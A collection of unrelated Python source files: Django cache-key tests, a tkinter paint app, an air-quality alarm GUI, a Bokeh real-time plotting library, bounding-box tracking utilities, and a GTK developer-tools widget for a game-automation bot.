request = self.factory.get(self.path)
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e'
)
@override_settings(USE_ETAGS=False)
def test_without_etag(self):
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertFalse(response.has_header('ETag'))
@override_settings(USE_ETAGS=True)
def test_with_etag(self):
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertTrue(response.has_header('ETag'))
class TestMakeTemplateFragmentKey(SimpleTestCase):
def test_without_vary_on(self):
key = make_template_fragment_key('a.fragment')
self.assertEqual(key, 'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e')
def test_with_one_vary_on(self):
key = make_template_fragment_key('foo', ['abc'])
self.assertEqual(key,
'template.cache.foo.900150983cd24fb0d6963f7d28e17f72')
def test_with_many_vary_on(self):
key = make_template_fragment_key('bar', ['abc', 'def'])
self.assertEqual(key,
'template.cache.bar.4b35f12ab03cec09beec4c21b2d2fa88')
def test_proper_escaping(self):
key = make_template_fragment_key('spam', ['abc:def%'])
self.assertEqual(key,
'template.cache.spam.f27688177baec990cdf3fbd9d9c3f469')
class CacheHandlerTest(SimpleTestCase):
def test_same_instance(self):
"""
Attempting to retrieve the same alias should yield the same instance.
"""
cache1 = caches['default']
cache2 = caches['default']
self.assertIs(cache1, cache2)
def test_per_thread(self):
"""
Requesting the same alias from separate threads should yield separate
instances.
"""
c = []
def runner():
c.append(caches['default'])
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertIsNot(c[0], c[1])
|
paint.py | from tkinter import *
from tkinter import messagebox
from tkinter.colorchooser import askcolor
import threading
import time
from PIL import Image
import os
class Paint(object):
DEFAULT_PEN_SIZE = 5.0
DEFAULT_COLOR = 'black'
DEFAULT_DELAY = 5 * pow(10,8)
def __init__(self,w,h,q):
self.root = Tk()
self.q = q
self.time = time.time_ns()
self.pen_button = Button(self.root, text='pen', command=self.use_pen)
self.pen_button.grid(row=0, column=0)
#self.brush_button = Button(self.root, text='brush', command=self.use_brush)
#self.brush_button.grid(row=0, column=1)
self.color_button = Button(self.root, text='color', command=self.choose_color)
self.color_button.grid(row=0, column=1)
self.eraser_button = Button(self.root, text='eraser', command=self.use_eraser)
self.eraser_button.grid(row=0, column=2)
self.save_button = Button(self.root, text='save', command=self.save)
self.save_button.grid(row=0, column=3)
self.choose_size_button = Scale(self.root, from_=1, to=10, orient=HORIZONTAL)
self.choose_size_button.grid(row=0, column=4)
self.c = Canvas(self.root, bg='white', width=w, height=h)
self.c.grid(row=1, columnspan=5)
self.setup()
self.t = threading.Thread(target=self.handle).start()
self.root.mainloop()
def handle(self):
while True:
event = self.q.get()
self.paint(event)
self.time = time.time_ns()
def save(self,filename=str(int(time.time()))):
self.c.postscript(file=f"{filename}.eps")
img = Image.open(f"{filename}.eps")
img.save(f"{filename}.png","png")
os.remove(f"{filename}.eps")
#print(f"Saved canvas to {filename}!!!")
messagebox.showinfo("Saved",f"Saved canvas to {filename}.png!!!")
def setup(self):
self.old_x = None
self.old_y = None
self.line_width = self.choose_size_button.get()
self.color = self.DEFAULT_COLOR
self.eraser_on = False
self.active_button = self.pen_button
self.c.bind('<B1-Motion>', self.paint)
self.c.bind('<ButtonRelease-1>', self.reset)
def use_pen(self):
self.activate_button(self.pen_button)
def use_brush(self):
self.activate_button(self.brush_button)
def choose_color(self):
self.eraser_on = False
self.color = askcolor(color=self.color)[1]
def use_eraser(self):
self.activate_button(self.eraser_button, eraser_mode=True)
def activate_button(self, some_button, eraser_mode=False):
self.active_button.config(relief=RAISED)
some_button.config(relief=SUNKEN)
self.active_button = some_button
self.eraser_on = eraser_mode
def paint(self, event):
#print(f"Painting with event: {event.x} and {event.y}")
diff = time.time_ns() - self.time
print(diff)
if diff > self.DEFAULT_DELAY:
self.reset(None)
return
#self.time = time.time_ns()
self.line_width = self.choose_size_button.get()
paint_color = 'white' if self.eraser_on else self.color
if self.old_x and self.old_y:
self.c.create_line(self.old_x, self.old_y, event.x, event.y,
width=self.line_width, fill=paint_color,
capstyle=ROUND, smooth=TRUE, splinesteps=36)
self.old_x = event.x
self.old_y = event.y
def reset(self, event):
self.old_x, self.old_y = None, None
if __name__ == '__main__':
Paint()
|
02_aq_meter_alarm.py | import threading
import time
from guizero import App, Text, Slider
from aq import AQ
aq = AQ()
app = App(title="Air Quality", width=550, height=400, layout="grid")
def update_readings(): # update fields with new temp and eCO2 readings
while True:
temp_c_field.value = str(aq.get_temp())
eco2 = aq.get_eco2()
eco2_field.value = str(eco2)
if eco2 > slider.value:
app.bg = "red"
app.text_color = "white"
aq.buzzer_on()
else:
app.bg = "white"
app.text_color = "black"
aq.buzzer_off()
time.sleep(0.5)
t1 = threading.Thread(target=update_readings)
t1.start() # start the thread that updates the readings
aq.leds_automatic()
# define the user interface
Text(app, text="Temp (C)", grid=[0,0], size=20)
temp_c_field = Text(app, text="-", grid=[1,0], size=100)
Text(app, text="eCO2 (ppm)", grid=[0,1], size=20)
eco2_field = Text(app, text="-", grid=[1,1], size=100)
Text(app, text="Alarm (ppm)", grid=[0,2], size=20)
slider = Slider(app, start=300, end=2000, width=300, height=40, grid=[1,2])
app.display()
|
bokeh_gui.py | #!/usr/bin/env python3
import sys
import queue
from datetime import datetime
import itertools
import threading
from functools import partial
import asyncio
import socket
from bokeh.server.server import Server
from bokeh.application import Application
from bokeh.application.handlers.function import FunctionHandler
from bokeh.plotting import figure, ColumnDataSource
from bokeh.models import Range1d
from bokeh.palettes import Category20_20 as palette
from bokeh.plotting import save, output_file
from bokeh.layouts import gridplot, column, row
from bokeh.models.widgets import CheckboxGroup
from bokeh.models.widgets.buttons import Button
from bokeh.models.widgets import TextInput
from bokeh.models import TextAreaInput
from bokeh.models import Panel, Tabs
from bokeh.models import DataTable, TableColumn
from bokeh.models import CustomJS
from bokeh import events
class UpdateEvent(object):
"""@brief Responsible for holding the state of an event sent from a non GUI thread
to the GUI thread context in order to update the GUI. The details of these
updates will be specific to the GUI implemented. Therefore this class should
be extended to include the events that are specific to the GUI implemented."""
UPDATE_STATUS_TEXT = 1 # This is an example of an event. It is intended to be used to
# update the status line in the GUI to provide the user with
# some feedback as to the current state of the GUI.
def __init__(self, id, argList=None):
"""@brief Constructor
@param id An integer event ID
@param argList A list of arguments associated with the event"""
#As this is esentially a holding class we don't attempt to indicate provate attributes
self.id = id
self.argList = argList
class TimeSeriesPoint(object):
"""@brief Resonsible for holding a time series point on a trace."""
def __init__(self, traceIndex, value, timeStamp=None):
"""@brief Constructor
@param traceIndex The index of the trace this reading should be applied to.
The trace index starts at 0 for the top left plot (first
trace added) and increments with each call to addTrace()
on TimeSeriesPlotter instances.
@param value The Y value
@param timeStamp The x Value."""
self.traceIndex = traceIndex
if timeStamp:
self.time = timeStamp
else:
self.time = datetime.now()
self.value = value
class TabbedGUI(object):
"""@brief A Generalised class responsible for plotting real time data."""
@staticmethod
def GetFigure(title=None, yAxisName=None, yRangeLimits=None, width=400, height=400):
"""@brief A Factory method to obtain a figure instance.
A figure is a single plot area that can contain multiple traces.
@param title The title of the figure.
@param yAxisName The name of the Y axis.
@param yRangeLimits If None then the Y azxis will auto range.
If a list of two numerical values then this
defines the min and max Y axis range values.
@param width The width of the plot area in pixels.
@param height The height of the plot area in pixels.
@return A figure instance."""
if yRangeLimits and len(yRangeLimits) == 2:
yrange = Range1d(yRangeLimits[0], yRangeLimits[1])
else:
yrange = None
fig = figure(title=title,
x_axis_type="datetime",
x_axis_location="below",
y_range=yrange,
plot_width=width,
plot_height=height)
fig.yaxis.axis_label = yAxisName
return fig
def __init__(self, docTitle, bokehPort=9090):
"""@brief Constructor.
@param docTitle The document title.
@param bokehPort The port to run the server on."""
self._docTitle=docTitle
self._bokehPort=bokehPort
self._doc = None
self._tabList = []
self._server = None
def stopServer(self):
"""@brief Stop the bokeh server"""
sys.exit()
def isServerRunning(self):
"""@brief Check if the server is running.
@param True if the server is running. It may take some time (~ 20 seconds)
after the browser is closed before the server session shuts down."""
serverSessions = "not started"
if self._server:
serverSessions = self._server.get_sessions()
serverRunning = True
if not serverSessions:
serverRunning = False
return serverRunning
def runBokehServer(self):
"""@brief Run the bokeh server. This is a blocking method."""
apps = {'/': Application(FunctionHandler(self.createPlot))}
self._server = Server(apps, port=self._bokehPort)
self._server.show("/")
self._server.run_until_shutdown()
def _run(self, method, args=[]):
"""@brief Run a method in a separate thread. This is useful when
methods are called from gui events that take some time to execute.
For such methods the gui callback should call this method to execute
the time consuming methods in another thread.
@param method The method to execute.
@param A tuple of arguments to pass to the method.
If no arguments are required then an empty tuple should be passed."""
thread = threading.Thread(target=method, args=args)
thread.start()
def _sendUpdateEvent(self, updateEvent):
"""@brief Send an event to the GUI context to update the GUI. When methods
are executing outside the gui thread but need to update the state
of the GUI, events must be sent to the gui context in order to update
the gui elements when they have the correct locks.
@param updateEvent An UpdateEvent instance."""
self._doc.add_next_tick_callback( partial(self._rxUpdateEvent, updateEvent) )
def _rxUpdateEvent(self, updateEvent):
"""@brief Receive an event into the GUI context to update the GUI.
@param updateEvent An PSUGUIUpdateEvent instance. This method will
be specific to the GUI implemented and must therefore
be overridden in child classes."""
raise Exception("BUG: The _rxUpdateEvent() method must be implemented by classes that are children of the TabbedGUI class.")
class TimeSeriesPlotter(TabbedGUI):
"""@brief Responsible for plotting data on tab 0 with no other tabs."""
def __init__(self, docTitle, bokehPort=9091, topCtrlPanel=True):
"""@Constructor
@param docTitle The document title.
@param bokehPort The port to run the server on.
@param topCtrlPanel If True then a control panel is displayed at the top of the plot.
"""
super().__init__(docTitle, bokehPort=bokehPort)
self._statusAreaInput = None
self._figTable=[[]]
self._grid = None
self._topCtrlPanel=topCtrlPanel
self._srcList = []
self._colors = itertools.cycle(palette)
self._queue = queue.Queue()
self._plottingEnabled = True
def addTrace(self, fig, legend_label, line_color=None, line_width=1):
"""@brief Add a trace to a figure.
@param fig The figure to add the trace to.
@param line_color The line color
@param legend_label The text of the label.
@param line_width The trace line width."""
src = ColumnDataSource({'x': [], 'y': []})
#Allocate a line color if one is not defined
if not line_color:
line_color = next(self._colors)
fig.line(source=src,
line_color = line_color,
legend_label = legend_label,
line_width = line_width)
self._srcList.append(src)
def _update(self):
"""@brief called periodically to update the plot traces."""
if self._plottingEnabled:
while not self._queue.empty():
timeSeriesPoint = self._queue.get()
new = {'x': [timeSeriesPoint.time],
'y': [timeSeriesPoint.value]}
source = self._srcList[timeSeriesPoint.traceIndex]
source.stream(new)
def addValue(self, traceIndex, value, timeStamp=None):
"""@brief Add a value to be plotted. This adds to queue of values
to be plotted the next time _update() is called.
@param traceIndex The index of the trace this reading should be applied to.
@param value The Y value to be plotted.
@param timeStamp The timestamp associated with the value. If not supplied
then the timestamp will be created at the time when This
method is called."""
timeSeriesPoint = TimeSeriesPoint(traceIndex, value, timeStamp=timeStamp)
self._queue.put(timeSeriesPoint)
def addRow(self):
"""@brief Add an empty row to the figures."""
self._figTable.append([])
def addToRow(self, fig):
"""@brief Add a figure to the end of the current row of figues.
@param fig The figure to add."""
self._figTable[-1].append(fig)
def createPlot(self, doc, ):
"""@brief create a plot figure.
@param doc The document to add the plot to."""
self._doc = doc
self._doc.title = self._docTitle
plotPanel = self._getPlotPanel()
self._tabList.append( Panel(child=plotPanel, title="Plots") )
self._doc.add_root( Tabs(tabs=self._tabList) )
self._doc.add_periodic_callback(self._update, 100)
def _getPlotPanel(self):
"""@brief Add tab that shows plot data updates."""
self._grid = gridplot(children = self._figTable, sizing_mode = 'scale_both', toolbar_location='left')
if self._topCtrlPanel:
checkbox1 = CheckboxGroup(labels=["Plot Data"], active=[0, 1],max_width=70)
checkbox1.on_change('active', self._checkboxHandler)
self._fileToSave = TextInput(title="File to save", max_width=150)
saveButton = Button(label="Save", button_type="success", width=50)
saveButton.on_click(self._savePlot)
shutDownButton = Button(label="Quit", button_type="success", width=50)
shutDownButton.on_click(self.stopServer)
self._statusBarWrapper = StatusBarWrapper()
plotRowCtrl = row(children=[checkbox1, saveButton, self._fileToSave, shutDownButton])
plotPanel = column([plotRowCtrl, self._grid, self._statusBarWrapper.getWidget()])
else:
plotPanel = column([self._grid])
return plotPanel
def _savePlot(self):
"""@brief Save plot to a single html file. This allows the plots to be
analysed later."""
if self._fileToSave and self._fileToSave.value:
if self._fileToSave.value.endswith(".html"):
filename = self._fileToSave.value
else:
filename = self._fileToSave.value + ".html"
output_file(filename)
# Save all the plots in the grid to an html file that allows
# display in a browser and plot manipulation.
save( self._grid )
self._statusBarWrapper.setStatus("Saved {}".format(filename))
def _checkboxHandler(self, attr, old, new):
"""@brief Called when the checkbox is clicked."""
if 0 in list(new): # Is first checkbox selected
self._plottingEnabled = True
self._statusBarWrapper.setStatus("Plotting enabled")
else:
self._plottingEnabled = False
self._statusBarWrapper.setStatus("Plotting disabled")
def runNonBlockingBokehServer(self):
"""@brief Run the bokeh server in a separate thread. This is useful
if the we want to load realtime data into the plot from the
main thread."""
self._serverThread = threading.Thread(target=self._runBokehServer)
self._serverThread.setDaemon(True)
self._serverThread.start()
def _runBokehServer(self):
"""@brief Run the bokeh server. This is called when the bokeh server is executed in a thread."""
apps = {'/': Application(FunctionHandler(self.createPlot))}
#As this gets run in a thread we need to start an event loop
evtLoop = asyncio.new_event_loop()
asyncio.set_event_loop(evtLoop)
self._server = Server(apps, port=self._bokehPort)
self._server.start()
#Show the server in a web browser window
self._server.io_loop.add_callback(self._server.show, "/")
self._server.io_loop.start()
class StatusBarWrapper(object):
"""@brief Responsible for presenting a single status line of text in a GUI
that runs the width of the page (normally at the bottom)."""
def __init__(self):
data = dict(
status = [],
)
self.source = ColumnDataSource(data)
columns = [
TableColumn(field="status", title="status"),
]
self.statusBar = DataTable(source=self.source, columns=columns, height_policy="fixed", height=50, header_row=False, index_position=None)
def getWidget(self):
"""@brief return an instance of the status bar widget to be added to a layout."""
return self.statusBar
def setStatus(self, msg):
"""@brief Set the message iun the status bar.
@param The message to be displayed."""
self.source.data = {"status": [msg]}
class ReadOnlyTableWrapper(object):
"""@brief Responsible for presenting a table of values that can be updated dynamically."""
def __init__(self, columnNameList, height=400, heightPolicy="auto", showLastRows=0, index_position=None):
"""@brief Constructor
@param columnNameList A List of strings denoting each column in the 2 dimensional table.
@param height The hieght of the table viewport in pixels.
@param heightPolicy The height policy (auto, fixed, fit, min, max). default=fixed.
@param showLastRows The number of rows to show in the table. If set to 2 then only
the last two rows in the table are displayed but they ate scrolled into view.
The default=0 which will display all rows and will not scroll the latest
into view..
@param index_position The position of the index column in the table. 0 = the first
column. Default is None which does not display the index column."""
self._columnNameList = columnNameList
self._dataDict = {}
self._columns = []
for columnName in columnNameList:
self._dataDict[columnName]=[]
self._columns.append( TableColumn(field=columnName, title=columnName) )
self._source = ColumnDataSource(self._dataDict)
self._dataTable = DataTable(source=self._source, columns=self._columns, height=height, height_policy=heightPolicy, frozen_rows=-showLastRows, index_position=index_position)
def getWidget(self):
"""@brief Return an instance of the DataTable widget to be added to a layout."""
return self._dataTable
def setRows(self, rowList):
"""@brief Set the rows in the table.
@param rowList A list of rows of data. Each row must contain a list of values for each column in the table."""
for _row in rowList:
if len(_row) != len(self._columnNameList):
raise Exception("{} row should have {} values.".format(_row, len(self._columnNameList)))
dataDict = {}
colIndex = 0
for columnName in self._columnNameList:
valueList = []
for _row in rowList:
valueList.append( _row[colIndex] )
dataDict[columnName]=valueList
colIndex = colIndex + 1
self._source.data = dataDict
def appendRow(self, _row):
"""@brief Set the rows in the table.
@param rowList A list of rows of data. Each row must contain a list of values for each column in the table."""
dataDict = {}
colIndex = 0
for columnName in self._columnNameList:
valueList = [_row[colIndex]]
dataDict[columnName]=valueList
colIndex = colIndex + 1
self._source.stream(dataDict)
class AlertButtonWrapper(object):
"""@brief Responsible for presenting a button that when clicked displayed an alert dialog."""
def __init__(self, buttonLabel, alertMessage, buttonType="default", onClickMethod=None):
"""@brief Constructor
@param buttonLabel The text displayed on the button.
@param alertMessage The message displayed in the alert dialog when clicked.
@param buttonType The type of button to display (default, primary, success, warning, danger, light)).
@param onClickMethod An optional method that is called when the alert OK button has been clicked.
"""
self._button = Button(label=buttonLabel, button_type=buttonType)
if onClickMethod:
self.addOnClickMethod(onClickMethod)
source = {"msg": alertMessage}
callback1 = CustomJS(args=dict(source=source), code="""
var msg = source['msg']
alert(msg);
""")
self._button.js_on_event(events.ButtonClick, callback1)
def addOnClickMethod(self, onClickMethod):
"""@brief Add a method that is called after the alert dialog has been displayed.
@param onClickMethod The method that is called."""
self._button.on_click(onClickMethod)
def getWidget(self):
"""@brief return an instance of the button widget to be added to a layout."""
return self._button
class ShutdownButtonWrapper(object):
"""@brief Responsible for presenting a shutdown button. When the button is clicked
an alert message is displayed instructing the user to close the browser
window. When the OK button in the alert dialog is clicked the
application is shutdown."""
def __init__(self, shutDownMethod):
"""@brief Constructor
@param shutDownMethod The method that is called to shutdown the application.
"""
self._alertButtonWrapper = AlertButtonWrapper("Quit",\
"The application is shutting down. Please close the browser window",\
buttonType="danger",\
onClickMethod=shutDownMethod)
def getWidget(self):
"""@brief return an instance of the shutdown button widget to be added to a layout."""
return self._alertButtonWrapper.getWidget()
class SingleAppServer(object):
"""@brief Responsible for running a bokeh server containing a single app.
The server may be started by calling either a blocking or a non
blocking method. This provides a basic parennt class with
the freedom to define your app as required."""
@staticmethod
def GetNextUnusedPort(basePort=1024, maxPort = 65534, bindAddress="localhost"):
"""@brief Get the first unused above the base port.
@param basePort The port to start checking for available ports.
@param maxPort The highest port number to check.
@param bindAddress The address to bind to.
@return The TCP port or -1 if no port is available."""
port = basePort
while True:
try:
sock = socket.socket()
sock.bind((bindAddress, port))
sock.close()
break
except:
port = port + 1
if port > maxPort:
port = -1
break
return port
def __init__(self, bokehPort=0):
"""@Constructor
@param bokehPort The TCP port to run the server on. If left at the default
of 0 then a spare TCP port will be used.
"""
if bokehPort == 0:
bokehPort = SingleAppServer.GetNextUnusedPort()
self._bokehPort=bokehPort
def getServerPort(self):
"""@return The bokeh server port."""
return self._bokehPort
def runBlockingBokehServer(self, appMethod):
"""@brief Run the bokeh server. This method will only return when the server shuts down.
@param appMethod The method called to create the app."""
apps = {'/': Application(FunctionHandler(appMethod))}
#As this gets run in a thread we need to start an event loop
evtLoop = asyncio.new_event_loop()
asyncio.set_event_loop(evtLoop)
self._server = Server(apps, port=self._bokehPort)
self._server.start()
#Show the server in a web browser window
self._server.io_loop.add_callback(self._server.show, "/")
self._server.io_loop.start()
def runNonBlockingBokehServer(self, appMethod):
"""@brief Run the bokeh server in a separate thread. This is useful
if the we want to load realtime data into the plot from the
main thread.
@param appMethod The method called to create the app."""
self._serverThread = threading.Thread(target=self.runBlockingBokehServer, args=(appMethod,))
self._serverThread.setDaemon(True)
self._serverThread.start()
|
tracking_utils.py | import threading
import time
import numpy as np
class Box:
def __init__(self, x_y_w_h):
self.x, self.y, self.w, self.h = [int(v) for v in x_y_w_h]
self.is_discarded: bool = False
self.is_being_discarded: bool = False
def update(self, x_y_w_h):
self.x, self.y, self.w, self.h = map(lambda x: int(x), x_y_w_h)
def discard(self):
if self.is_being_discarded:
self.is_discarded =True
def area(self):
return self.w*self.h
def __str__(self):
return "({}, {}, {}, {})".format(self.x, self.y, self.w, self.h)
class Countdown(object):
def __init__(self, obj_box):
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
self.b = obj_box
def run(self):
for i in range(2):
print("is discarding now")
time.sleep(1)
self.b.discard()
def which_is_foreground(bodies):
def area(box):
(x, y, w, h) = box
return w * h
return bodies[list(map(area, bodies)).index(max(map(area, bodies)))]
def calculate_iou(box_d, box_t):
(x1, y1, w1, h1) = box_d
(x2, y2, w2, h2) = (box_t.x, box_t.y, box_t.w, box_t.h)
w_intersec = min(x1 + w1, x2 + w2) - max(x1, x2)
h_intersec = min (y1 + h1, y2 + h2) - max(y1, y2)
if w_intersec <=0 or h_intersec<=0:
iou = 0
I = w_intersec * h_intersec
U = w1 * h1 + w2 * h2 - I
iou = I/U
return iou
|
dev.py | # Dindo Bot
# Copyright (c) 2018 - 2019 AXeL
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk, Gdk, GdkPixbuf
from lib import tools, data, convert
from .custom import CustomTreeView, CustomComboBox, MenuButton, SpinButton, ButtonBox
from .dialog import CopyTextDialog
from threading import Thread
class DevToolsWidget(Gtk.Box):
def __init__(self, parent):
Gtk.Box.__init__(self, orientation=Gtk.Orientation.VERTICAL, spacing=5)
self.set_border_width(10)
self.parent = parent
#self.parent.connect('button-press-event', self.on_click)
## Pixel
top_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
top_box.add(Gtk.Label('<b>Pixel</b>', xalign=0, use_markup=True))
hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=10)
top_box.pack_start(hbox, True, True, 0)
self.add(top_box)
# TreeView
model = Gtk.ListStore(GdkPixbuf.Pixbuf, int, int, int, int, str)
text_renderer = Gtk.CellRendererText()
columns = [
Gtk.TreeViewColumn('', Gtk.CellRendererPixbuf(), pixbuf=0),
Gtk.TreeViewColumn('X', text_renderer, text=1),
Gtk.TreeViewColumn('Y', text_renderer, text=2),
Gtk.TreeViewColumn('Width', text_renderer, text=3),
Gtk.TreeViewColumn('Height', text_renderer, text=4),
Gtk.TreeViewColumn('Color', text_renderer, text=5)
]
self.tree_view = CustomTreeView(model, columns)
self.tree_view.connect('button-press-event', self.on_tree_view_double_clicked)
self.tree_view.connect('selection-changed', self.on_tree_view_selection_changed)
hbox.pack_start(self.tree_view, True, True, 0)
# Select
buttons_box = ButtonBox(orientation=Gtk.Orientation.VERTICAL, centered=True, linked=True)
hbox.add(buttons_box)
self.select_pixel_button = Gtk.Button()
pixbuf = GdkPixbuf.Pixbuf.new_from_file_at_size(tools.get_full_path('icons/crosshair.png'), 16, 16)
#pixbuf = Gdk.Cursor(Gdk.CursorType.CROSSHAIR).get_image().scale_simple(18, 18, GdkPixbuf.InterpType.BILINEAR)
self.select_pixel_button.set_image(Gtk.Image(pixbuf=pixbuf))
self.select_pixel_button.set_tooltip_text('Select')
self.select_pixel_button.connect('clicked', self.on_select_pixel_button_clicked)
buttons_box.add(self.select_pixel_button)
# Simulate
self.simulate_click_button = Gtk.Button()
pixbuf = GdkPixbuf.Pixbuf.new_from_file_at_size(tools.get_full_path('icons/hand.png'), 16, 16)
#pixbuf = Gdk.Cursor(Gdk.CursorType.HAND1).get_image().scale_simple(18, 18, GdkPixbuf.InterpType.BILINEAR)
self.simulate_click_button.set_image(Gtk.Image(pixbuf=pixbuf))
self.simulate_click_button.set_tooltip_text('Simulate Click')
self.simulate_click_button.set_sensitive(False)
self.simulate_click_button.connect('clicked', self.on_simulate_click_button_clicked)
buttons_box.add(self.simulate_click_button)
# Delete
self.delete_pixel_button = Gtk.Button()
self.delete_pixel_button.set_image(Gtk.Image(icon_name='edit-delete-symbolic'))
self.delete_pixel_button.set_tooltip_text('Delete')
self.delete_pixel_button.set_sensitive(False)
self.delete_pixel_button.connect('clicked', self.on_delete_pixel_button_clicked)
buttons_box.add(self.delete_pixel_button)
## Key Press
bottom_box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)
self.add(bottom_box)
vbox = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
bottom_box.pack_start(vbox, True, True, 0)
hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)
vbox.add(hbox)
hbox.add(Gtk.Label('<b>Key Press</b>', xalign=0, use_markup=True))
# Label
self.keys_label = Gtk.Label()
hbox.add(self.keys_label)
# ComboBox
hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)
vbox.add(hbox)
self.keys_combo = CustomComboBox(data.KeyboardShortcuts, sort=True)
self.keys_combo.connect('changed', self.on_keys_combo_changed)
hbox.pack_start(self.keys_combo, True, True, 0)
# Simulate
self.simulate_key_press_button = Gtk.Button()
self.simulate_key_press_button.set_image(Gtk.Image(icon_name='input-keyboard'))
self.simulate_key_press_button.set_tooltip_text('Simulate')
self.simulate_key_press_button.set_sensitive(False)
self.simulate_key_press_button.connect('clicked', self.on_simulate_key_press_button_clicked)
hbox.add(self.simulate_key_press_button)
## Scroll
vbox.add(Gtk.Label('<b>Scroll</b>', xalign=0, use_markup=True))
hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)
vbox.add(hbox)
# Direction
self.scroll_direction_combo = CustomComboBox(['up', 'down'])
self.scroll_direction_combo.set_active(1)
hbox.pack_start(self.scroll_direction_combo, True, True, 0)
# Value
self.scroll_menu_button = MenuButton(text='1', position=Gtk.PositionType.TOP)
self.scroll_spin_button = SpinButton(min=1, max=10)
self.scroll_spin_button.connect('value-changed', lambda button: self.scroll_menu_button.set_label(str(button.get_value_as_int())))
self.scroll_menu_button.add(self.scroll_spin_button)
hbox.add(self.scroll_menu_button)
# Simulate
simulate_scroll_button = Gtk.Button()
pixbuf = GdkPixbuf.Pixbuf.new_from_file_at_size(tools.get_full_path('icons/scroll.png'), 16, 16)
#pixbuf = Gdk.Cursor(Gdk.CursorType.SB_V_DOUBLE_ARROW).get_image().scale_simple(18, 18, GdkPixbuf.InterpType.BILINEAR)
simulate_scroll_button.set_image(Gtk.Image(pixbuf=pixbuf))
simulate_scroll_button.set_tooltip_text('Simulate')
simulate_scroll_button.connect('clicked', self.on_simulate_scroll_button_clicked)
hbox.add(simulate_scroll_button)
def on_simulate_scroll_button_clicked(self, button):
# get scroll value
direction = self.scroll_direction_combo.get_active_text()
value = self.scroll_spin_button.get_value_as_int()
clicks = value if direction == 'up' else -value
if self.parent.game_window and not self.parent.game_window.is_destroyed() and self.parent.game_window_location:
# get the center of the game location
x, y = tools.coordinates_center(self.parent.game_window_location)
else:
x, y = (None, None)
# scroll
self.parent.focus_game()
self.parent.debug('Scroll: %d' % clicks)
tools.scroll_to(clicks, x, y, 0.5)
def on_keys_combo_changed(self, combo):
selected = combo.get_active_text()
self.keys_label.set_text('(' + data.KeyboardShortcuts[selected] + ')')
if not self.simulate_key_press_button.get_sensitive():
self.simulate_key_press_button.set_sensitive(True)
def add_pixel(self, location):
x, y, width, height, color = location
# create pixbuf
pixbuf = GdkPixbuf.Pixbuf.new(GdkPixbuf.Colorspace.RGB, False, 8, 10, 10)
pixel = convert.rgb2pixel(color)
pixbuf.fill(pixel)
# append to treeview
self.tree_view.append_row([pixbuf, x, y, width, height, str(color)])
self.select_pixel_button.set_sensitive(True)
self.parent.set_cursor(Gdk.Cursor(Gdk.CursorType.ARROW))
def on_select_pixel_button_clicked(self, button):
button.set_sensitive(False)
self.parent.set_cursor(Gdk.Cursor(Gdk.CursorType.CROSSHAIR))
# wait for click
Thread(target=self.parent.wait_for_click, args=(self.add_pixel, self.parent.game_window_location)).start()
def on_simulate_click_button_clicked(self, button):
# get click coordinates
selected_row = self.tree_view.get_selected_row()
x, y, width, height = (selected_row[1], selected_row[2], selected_row[3], selected_row[4])
#print('x: %d, y: %d, width: %d, height: %d' % (x, y, width, height))
# adjust for game area
if self.parent.game_window and not self.parent.game_window.is_destroyed() and self.parent.game_window_location:
game_x, game_y, game_width, game_height = self.parent.game_window_location
#print('game_x: %d, game_y: %d, game_width: %d, game_height: %d' % (game_x, game_y, game_width, game_height))
click_x, click_y = tools.adjust_click_position(x, y, width, height, game_x, game_y, game_width, game_height)
else:
click_x = x
click_y = y
# perform click
self.parent.debug('Simulate click on x: %d, y: %d' % (click_x, click_y))
tools.perform_click(click_x, click_y)
def on_delete_pixel_button_clicked(self, button):
self.tree_view.remove_selected_row()
def on_simulate_key_press_button_clicked(self, button):
selected = self.keys_combo.get_active_text()
key = data.KeyboardShortcuts[selected]
self.parent.focus_game()
self.parent.debug('Press key: %s' % key)
tools.press_key(key, 0.5)
def on_click(self, widget, event):
print('x: %d, y: %d' % (event.x, event.y))
def on_tree_view_double_clicked(self, widget, event):
if event.type == Gdk.EventType.DOUBLE_BUTTON_PRESS:
selected_row = self.tree_view.get_selected_row()
if selected_row:
x, y, width, height, color = (selected_row[1], selected_row[2], selected_row[3], selected_row[4], selected_row[5])
CopyTextDialog(self.parent, "{'x': %d, 'y': %d, 'width': %d, 'height': %d, 'color': %s}" % (x, y, width, height, color))
def on_tree_view_selection_changed(self, selection):
model, tree_iter = selection.get_selected()
